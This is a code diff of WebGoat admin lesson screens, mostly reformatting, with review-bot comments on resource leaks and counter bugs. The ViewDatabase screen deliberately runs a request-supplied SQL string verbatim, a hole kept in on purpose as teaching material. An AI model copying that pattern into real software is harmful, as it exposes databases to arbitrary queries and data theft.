@@ -21,317 +21,294 @@ import org.owasp.webgoat.session.Screen; import org.owasp.webgoat.session.UserTracker; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce mayhew WebGoat + * @created October 28, 2003 */ public class SummaryReportCardScreen extends LessonAdapter { - private int totalUsersNormalComplete = 0; + private int totalUsersNormalComplete = 0; - private int totalUsersAdminComplete = 0; + private int totalUsersAdminComplete = 0; - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - String selectedUser = null; - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - if (s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN)) - { - Enumeration e = s.getParser().getParameterNames(); + ElementContainer ec = new ElementContainer(); - while (e.hasMoreElements()) + String selectedUser = null; + + try { - String key = (String) e.nextElement(); - if (key.startsWith("View_")) - { - selectedUser = key.substring("View_".length()); - ReportCardScreen reportCard = new ReportCardScreen(); - return reportCard.makeReportCard(s, selectedUser); - } - if (key.startsWith("Delete_")) - { - selectedUser = key.substring("Delete_".length()); - deleteUser(selectedUser); - } + if 
(s.getRequest().isUserInRole(WebSession.WEBGOAT_ADMIN)) + { + Enumeration e = s.getParser().getParameterNames(); + + while (e.hasMoreElements()) + { + String key = (String) e.nextElement(); + if (key.startsWith("View_")) + { + selectedUser = key.substring("View_".length()); + ReportCardScreen reportCard = new ReportCardScreen(); + return reportCard.makeReportCard(s, selectedUser); + } + if (key.startsWith("Delete_")) + { + selectedUser = key.substring("Delete_".length()); + deleteUser(selectedUser); + } + } + } + } catch (Exception e) + { + e.printStackTrace(); } - } + + ec.addElement(new Center().addElement(makeSummary(s))); + + ec.addElement(new P()); + + Table t = new Table().setCellSpacing(0).setCellPadding(4).setBorder(1).setWidth("100%"); + if (s.isColor()) + { + t.setBorder(1); + } + t.addElement(makeUserSummaryHeader()); + + for (Iterator userIter = UserTracker.instance().getAllUsers(WebSession.WEBGOAT_USER).iterator(); userIter + .hasNext();) + { + + String user = userIter.next(); + t.addElement(makeUserSummaryRow(s, user)); + } + + ec.addElement(new Center().addElement(t)); + + return ec; } - catch (Exception e) + + protected Element makeSummary(WebSession s) { - e.printStackTrace(); + Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("100%"); + if (s.isColor()) + { + t.setBorder(1); + } + TR tr = new TR(); + // tr.addElement( new TH().addElement( "Summary").setColSpan(1)); + // t.addElement( tr ); + + tr = new TR(); + tr.addElement(new TD().setWidth("60%").addElement("Total number of users")); + tr.addElement(new TD().setAlign("LEFT").addElement( + Integer.toString(UserTracker.instance() + .getAllUsers(WebSession.WEBGOAT_USER).size()))); + t.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().setWidth("60%").addElement("Total number of users that completed all normal lessons")); + tr.addElement(new TD().setAlign("LEFT").addElement(Integer.toString(totalUsersNormalComplete))); + t.addElement(tr); + + tr = new TR(); + 
tr.addElement(new TD().setWidth("60%").addElement("Total number of users that completed all admin lessons")); + tr.addElement(new TD().setAlign("LEFT").addElement(Integer.toString(totalUsersAdminComplete))); + t.addElement(tr); + return t; } - ec.addElement(new Center().addElement(makeSummary(s))); - - ec.addElement(new P()); - - Table t = new Table().setCellSpacing(0).setCellPadding(4).setBorder(1) - .setWidth("100%"); - if (s.isColor()) + private void deleteUser(String user) { - t.setBorder(1); + UserTracker.instance().deleteUser(user); } - t.addElement(makeUserSummaryHeader()); - for (Iterator userIter = UserTracker.instance().getAllUsers( - WebSession.WEBGOAT_USER).iterator(); userIter.hasNext();) + /** + * Gets the category attribute of the UserAdminScreen object + * + * @return The category value + */ + protected Category getDefaultCategory() { - - String user = userIter.next(); - t.addElement(makeUserSummaryRow(s, user)); + return Category.ADMIN_FUNCTIONS; } - ec.addElement(new Center().addElement(t)); + private final static Integer DEFAULT_RANKING = new Integer(1000); - return ec; - } - - - protected Element makeSummary(WebSession s) - { - Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) - .setWidth("100%"); - if (s.isColor()) + protected Integer getDefaultRanking() { - t.setBorder(1); + return DEFAULT_RANKING; } - TR tr = new TR(); - //tr.addElement( new TH().addElement( "Summary").setColSpan(1)); - //t.addElement( tr ); - tr = new TR(); - tr.addElement(new TD().setWidth("60%").addElement( - "Total number of users")); - tr.addElement(new TD().setAlign("LEFT").addElement( - Integer.toString(UserTracker.instance().getAllUsers( - WebSession.WEBGOAT_USER).size()))); - t.addElement(tr); - - tr = new TR(); - tr.addElement(new TD().setWidth("60%").addElement( - "Total number of users that completed all normal lessons")); - tr.addElement(new TD().setAlign("LEFT").addElement( - Integer.toString(totalUsersNormalComplete))); - t.addElement(tr); 
- - tr = new TR(); - tr.addElement(new TD().setWidth("60%").addElement( - "Total number of users that completed all admin lessons")); - tr.addElement(new TD().setAlign("LEFT").addElement( - Integer.toString(totalUsersAdminComplete))); - t.addElement(tr); - return t; - } - - - private void deleteUser(String user) - { - UserTracker.instance().deleteUser(user); - } - - - /** - * Gets the category attribute of the UserAdminScreen object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.ADMIN_FUNCTIONS; - } - - private final static Integer DEFAULT_RANKING = new Integer(1000); - - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the role attribute of the UserAdminScreen object - * - * @return The role value - */ - public String getRole() - { - return ADMIN_ROLE; - } - - - /** - * Gets the title attribute of the UserAdminScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Summary Report Card"); - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeMessages(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - return (ec); - } - - - /** - * Description of the Method - * - * @return Description of the Return Value - */ - protected Element makeUserSummaryHeader() - { - TR tr = new TR(); - - tr.addElement(new TH("User Name")); - tr.addElement(new TH("Normal Complete")); - tr.addElement(new TH("Admin Complete")); - tr.addElement(new TH("View")); - tr.addElement(new TH("Delete")); - - return tr; - } - - - /** - * Description of the Method - * - * @param s Description of the Parameter - * @param user Description of the Parameter - * @return Description of the Return Value - */ - protected Element makeUserSummaryRow(WebSession s, String user) - { - TR tr = new TR(); - - tr.addElement(new 
TD().setAlign("LEFT").addElement(user)); - int lessonCount = 0; - int passedCount = 0; - boolean normalComplete = false; - boolean adminComplete = false; - - for (Iterator lessonIter = s.getCourse().getLessons(s, - AbstractLesson.USER_ROLE).iterator(); lessonIter.hasNext();) + /** + * Gets the role attribute of the UserAdminScreen object + * + * @return The role value + */ + public String getRole() { - lessonCount++; - Screen screen = (Screen) lessonIter.next(); - - LessonTracker lessonTracker = UserTracker.instance() - .getLessonTracker(s, user, screen); - if (lessonTracker.getCompleted()) - { - passedCount++; - } + return ADMIN_ROLE; } - if (lessonCount == passedCount) + + /** + * Gets the title attribute of the UserAdminScreen object + * + * @return The title value + */ + public String getTitle() { - normalComplete = true; - totalUsersNormalComplete++; + return ("Summary Report Card"); } - String text = Integer.toString(passedCount) + " of " - + Integer.toString(lessonCount); - tr.addElement(new TD().setAlign("CENTER").addElement(text)); - lessonCount = 0; - passedCount = 0; - for (Iterator lessonIter = s.getCourse().getLessons(s, - AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter - .hasNext();) + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element makeMessages(WebSession s) { - lessonCount++; - Screen screen = (Screen) lessonIter.next(); + ElementContainer ec = new ElementContainer(); - LessonTracker lessonTracker = UserTracker.instance() - .getLessonTracker(s, user, screen); - if (lessonTracker.getCompleted()) - { - passedCount++; - } + return (ec); } - if (lessonCount == passedCount) + + /** + * Description of the Method + * + * @return Description of the Return Value + */ + protected Element makeUserSummaryHeader() { - adminComplete = true; - totalUsersAdminComplete++; + TR tr = new TR(); + + tr.addElement(new TH("User Name")); + tr.addElement(new 
TH("Normal Complete")); + tr.addElement(new TH("Admin Complete")); + tr.addElement(new TH("View")); + tr.addElement(new TH("Delete")); + + return tr; } - text = Integer.toString(passedCount) + " of " - + Integer.toString(lessonCount); - tr.addElement(new TD().setAlign("CENTER").addElement(text)); - tr.addElement(new TD().setAlign("CENTER").addElement( - new Input(Input.SUBMIT, "View_" + user, "View"))); - tr.addElement(new TD().setAlign("CENTER").addElement( - new Input(Input.SUBMIT, "Delete_" + user, "Delete"))); - - if (normalComplete && adminComplete) + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @param user + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element makeUserSummaryRow(WebSession s, String user) { - tr.setBgColor(HtmlColor.GREEN); + TR tr = new TR(); + + tr.addElement(new TD().setAlign("LEFT").addElement(user)); + int lessonCount = 0; + int passedCount = 0; + boolean normalComplete = false; + boolean adminComplete = false; + + for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.USER_ROLE).iterator(); lessonIter + .hasNext();) + { + lessonCount++; + Screen screen = (Screen) lessonIter.next(); + + LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(s, user, screen); + if (lessonTracker.getCompleted()) + { + passedCount++; + } + } + if (lessonCount == passedCount) + { + normalComplete = true; + totalUsersNormalComplete++; + } + String text = Integer.toString(passedCount) + " of " + Integer.toString(lessonCount); + tr.addElement(new TD().setAlign("CENTER").addElement(text)); + + lessonCount = 0; + passedCount = 0; + for (Iterator lessonIter = s.getCourse().getLessons(s, AbstractLesson.HACKED_ADMIN_ROLE).iterator(); lessonIter + .hasNext();) + { + lessonCount++; + Screen screen = (Screen) lessonIter.next(); + + LessonTracker lessonTracker = UserTracker.instance().getLessonTracker(s, user, screen); + if 
(lessonTracker.getCompleted()) + { + passedCount++; + } + } + if (lessonCount == passedCount) + { + adminComplete = true; + totalUsersAdminComplete++; + } + text = Integer.toString(passedCount) + " of " + Integer.toString(lessonCount); + tr.addElement(new TD().setAlign("CENTER").addElement(text)); + + tr.addElement(new TD().setAlign("CENTER").addElement(new Input(Input.SUBMIT, "View_" + user, "View"))); + tr.addElement(new TD().setAlign("CENTER").addElement(new Input(Input.SUBMIT, "Delete_" + user, "Delete"))); + + if (normalComplete && adminComplete) + { + tr.setBgColor(HtmlColor.GREEN); + } + else if (normalComplete) + { + tr.setBgColor(HtmlColor.LIGHTGREEN); + } + else + { + tr.setBgColor(HtmlColor.LIGHTBLUE); + } + + return (tr); } - else if (normalComplete) + + public boolean isEnterprise() { - tr.setBgColor(HtmlColor.LIGHTGREEN); + return true; } - else - { - tr.setBgColor(HtmlColor.LIGHTBLUE); - } - - return (tr); - } - - - public boolean isEnterprise() - { - return true; - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java index f5aadd51e..024f1a8c3 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/UserAdminScreen.java @@ -1,10 +1,10 @@ + package org.owasp.webgoat.lessons.admin; import java.sql.Connection; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.Statement; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.owasp.webgoat.lessons.Category; 
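Review bot: The `totalUsersNormalComplete` and `totalUsersAdminComplete` fields that makeUserSummaryRow increments are never reset, and SummaryReportCardScreen.createContent adds `makeSummary(s)` to the page before the per-user loop runs, so the summary shows the totals accumulated by every previous render rather than this one, and they keep growing for as long as the lesson instance serves requests. Zero both fields at the top of createContent, build the user table first, and only then emit the summary (the rendered order on the page stays summary-then-table). Separately, the `Delete_` branch of the parameter-name loop calls `deleteUser(selectedUser)` and keeps iterating while a `View_` key returns immediately, so the outcome of a request carrying both depends on enumeration order; a one-line comment on that, `// View_ ends the render early; any Delete_ keys are applied only if enumerated before it`, would spare the next maintainer a surprise.
```java
        ElementContainer ec = new ElementContainer();
        // reset the per-render totals that makeUserSummaryRow accumulates
        totalUsersNormalComplete = 0;
        totalUsersAdminComplete = 0;
        // … unchanged: View_/Delete_ parameter handling, table setup, per-user row loop …
        // summary is built only after every makeUserSummaryRow call has counted its user
        ec.addElement(new Center().addElement(makeSummary(s)));
        ec.addElement(new P());
        ec.addElement(new Center().addElement(t));
        return ec;
```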
@@ -12,117 +12,110 @@ import org.owasp.webgoat.lessons.LessonAdapter; import org.owasp.webgoat.session.DatabaseUtilities; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author Bruce Mayhew WebGoat * @created October 28, 2003 */ public class UserAdminScreen extends LessonAdapter { - private final static String QUERY = "SELECT * FROM user_system_data"; + private final static String QUERY = "SELECT * FROM user_system_data"; - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - Connection connection = DatabaseUtilities.getConnection(s); + ElementContainer ec = new ElementContainer(); - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(QUERY); + try + { + Connection connection = DatabaseUtilities.getConnection(s); - if (results != null) - { - makeSuccess(s); - ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); - } - } - catch (Exception e) - { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); 
+ ResultSet results = statement.executeQuery(QUERY); + + if (results != null) + { + makeSuccess(s); + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + return (ec); } - return (ec); - } + /** + * Gets the category attribute of the UserAdminScreen object + * + * @return The category value + */ + protected Category getDefaultCategory() + { + return Category.ADMIN_FUNCTIONS; + } + private final static Integer DEFAULT_RANKING = new Integer(1000); - /** - * Gets the category attribute of the UserAdminScreen object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.ADMIN_FUNCTIONS; - } + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - private final static Integer DEFAULT_RANKING = new Integer(1000); + /** + * Gets the role attribute of the UserAdminScreen object + * + * @return The role value + */ + public String getRole() + { + return HACKED_ADMIN_ROLE; + } - - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } - - - /** - * Gets the role attribute of the UserAdminScreen object - * - * @return The role value - */ - public String getRole() - { - return HACKED_ADMIN_ROLE; - } - - - /** - * Gets the title attribute of the UserAdminScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("User Information"); - } + /** + * Gets the title attribute of the UserAdminScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("User Information"); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java index 86d3e89db..feaa406d4 100644 
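Review bot: In `createContent`, the `Statement` and `ResultSet` opened against the pooled connection are never closed on either the success or the exception path, so every render of this screen leaks a cursor until the driver reclaims it. Declare `statement` and `results` before the `try` and close them in a `finally` block (`if (results != null) results.close(); if (statement != null) statement.close();`), or, if the project's Java level allows it, use try-with-resources. The `catch (Exception e)` that only calls `e.printStackTrace()` also hides the JDBC error from whoever is reading the server log; logging the exception with the query and class name would make failures on this admin screen diagnosable. The `results != null` guard is redundant by the JDBC contract, since `executeQuery` never returns null.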
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/ViewDatabase.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.admin; import java.sql.Connection; 
@@ -13,160 +14,149 @@ import org.apache.ecs.StringElement; import org.apache.ecs.html.Input; import org.owasp.webgoat.session.*; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class ViewDatabase extends LessonAdapter { - private final static String SQL = "sql"; + private final static String SQL = "sql"; - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - - try + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) { - ec.addElement(new StringElement("Enter a SQL statement: ")); + ElementContainer ec = new ElementContainer(); - StringBuffer sqlStatement = new StringBuffer(s.getParser() - .getRawParameter(SQL, "")); - Input input = new Input(Input.TEXT, SQL, sqlStatement.toString()); - ec.addElement(input); - - Element b = ECSFactory.makeButton("Go!"); - ec.addElement(b); - - Connection connection = DatabaseUtilities.getConnection(s); - - if (sqlStatement.length() > 0) - { - - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(sqlStatement - .toString()); - - if ((results != null) && (results.first() == true)) + try { - makeSuccess(s); - 
ResultSetMetaData resultsMetaData = results.getMetaData(); - ec.addElement(DatabaseUtilities.writeTable(results, - resultsMetaData)); + ec.addElement(new StringElement("Enter a SQL statement: ")); + + StringBuffer sqlStatement = new StringBuffer(s.getParser().getRawParameter(SQL, "")); + Input input = new Input(Input.TEXT, SQL, sqlStatement.toString()); + ec.addElement(input); + + Element b = ECSFactory.makeButton("Go!"); + ec.addElement(b); + + Connection connection = DatabaseUtilities.getConnection(s); + + if (sqlStatement.length() > 0) + { + + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(sqlStatement.toString()); + + if ((results != null) && (results.first() == true)) + { + makeSuccess(s); + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + } + + } + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); } - } + return (ec); } - catch (Exception e) + + /** + * Gets the category attribute of the DatabaseScreen object + * + * @return The category value + */ + protected Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return Category.ADMIN_FUNCTIONS; } - return (ec); - } + private final static Integer DEFAULT_RANKING = new Integer(1000); + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } - /** - * Gets the category attribute of the DatabaseScreen object - * - * @return The category value - */ - protected Category getDefaultCategory() - { - return Category.ADMIN_FUNCTIONS; - } + /** + * Gets the hints attribute of the DatabaseScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("There are no hints defined"); - private final static 
Integer DEFAULT_RANKING = new Integer(1000); + return hints; + } + /** + * Gets the instructions attribute of the ViewDatabase object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "Please post a message to to the WebGoat forum. Your messages will be available for everyone to read."; - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + return (instructions); + } + /** + * Gets the role attribute of the ViewDatabase object + * + * @return The role value + */ + public String getRole() + { + return HACKED_ADMIN_ROLE; + } - /** - * Gets the hints attribute of the DatabaseScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("There are no hints defined"); - - return hints; - } - - - /** - * Gets the instructions attribute of the ViewDatabase object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "Please post a message to to the WebGoat forum. Your messages will be available for everyone to read."; - - return (instructions); - } - - - /** - * Gets the role attribute of the ViewDatabase object - * - * @return The role value - */ - public String getRole() - { - return HACKED_ADMIN_ROLE; - } - - - /** - * Gets the title attribute of the DatabaseScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Adhoc Query"); - } + /** + * Gets the title attribute of the DatabaseScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Adhoc Query"); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java index 5e4ae2c01..3501c0349 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java 
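Review bot: The string returned by `getInstructions` ("Please post a message to to the WebGoat forum…") describes a forum lesson, not this "Adhoc Query" screen, and contains a doubled "to"; it looks copied from another lesson and should describe what this screen does, e.g. `Enter a SQL statement to run against the WebGoat database; the results are shown below.`. Separately, the `createContent` Javadoc still reads "Description of the Method" although this is the one place in the admin package that executes a request-supplied string (`getRawParameter(SQL, "")`) verbatim via `executeQuery`; since that is intentional lesson material gated by `HACKED_ADMIN_ROLE`, a one-line comment saying so (`// Intentionally executes the raw "sql" request parameter: this is lesson content for the hacked-admin role, not a production pattern.`) would stop a later reader from "fixing" it and would make the behaviour visible to anyone auditing which screens accept SQL. As in UserAdminScreen, `statement` and `results` are never closed and should be released in a `finally` block.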
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/WelcomeAdminScreen.java 
@@ -1,91 +1,89 @@ + package org.owasp.webgoat.lessons.admin; import org.owasp.webgoat.lessons.WelcomeScreen; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.html.Center; import org.apache.ecs.html.H1; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Jeff Williams Aspect Security - * @created October 28, 2003 + * + * @author Jeff Williams Aspect Security + * @created October 28, 2003 */ public class WelcomeAdminScreen extends WelcomeScreen { - /** - * Constructor for the WelcomeAdminScreen object - * - * @param s Description of the Parameter - */ - public WelcomeAdminScreen(WebSession s) - { - super(s); - } + /** + * Constructor for the WelcomeAdminScreen object + * + * @param s + * Description of the Parameter + */ + public WelcomeAdminScreen(WebSession s) + { + super(s); + } + /** + * Constructor for the WelcomeAdminScreen object + */ + public WelcomeAdminScreen() + { + } - /** - * Constructor for the WelcomeAdminScreen object - */ - public WelcomeAdminScreen() - {} + /** + * Description of the Method + * + * @param s + * Description of the Parameter + * @return Description of the Return Value + */ + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); + ec.addElement(new Center(new H1("You are logged on as an administrator"))); + ec.addElement(super.createContent(s)); - /** - * Description of the Method - * - * @param s Description of the Parameter - * @return Description of the Return Value - */ - protected 
Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); + return (ec); + } - ec.addElement(new Center( - new H1("You are logged on as an administrator"))); - ec.addElement(super.createContent(s)); - - return (ec); - } - - - /** - * Gets the title attribute of the WelcomeAdminScreen object - * - * @return The title value - */ - public String getTitle() - { - return ("Admin Welcome"); - } + /** + * Gets the title attribute of the WelcomeAdminScreen object + * + * @return The title value + */ + public String getTitle() + { + return ("Admin Welcome"); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java b/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java index a28537df3..59147040b 100644 --- a/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java +++ b/main/project/JavaSource/org/owasp/webgoat/servlets/Controller.java 
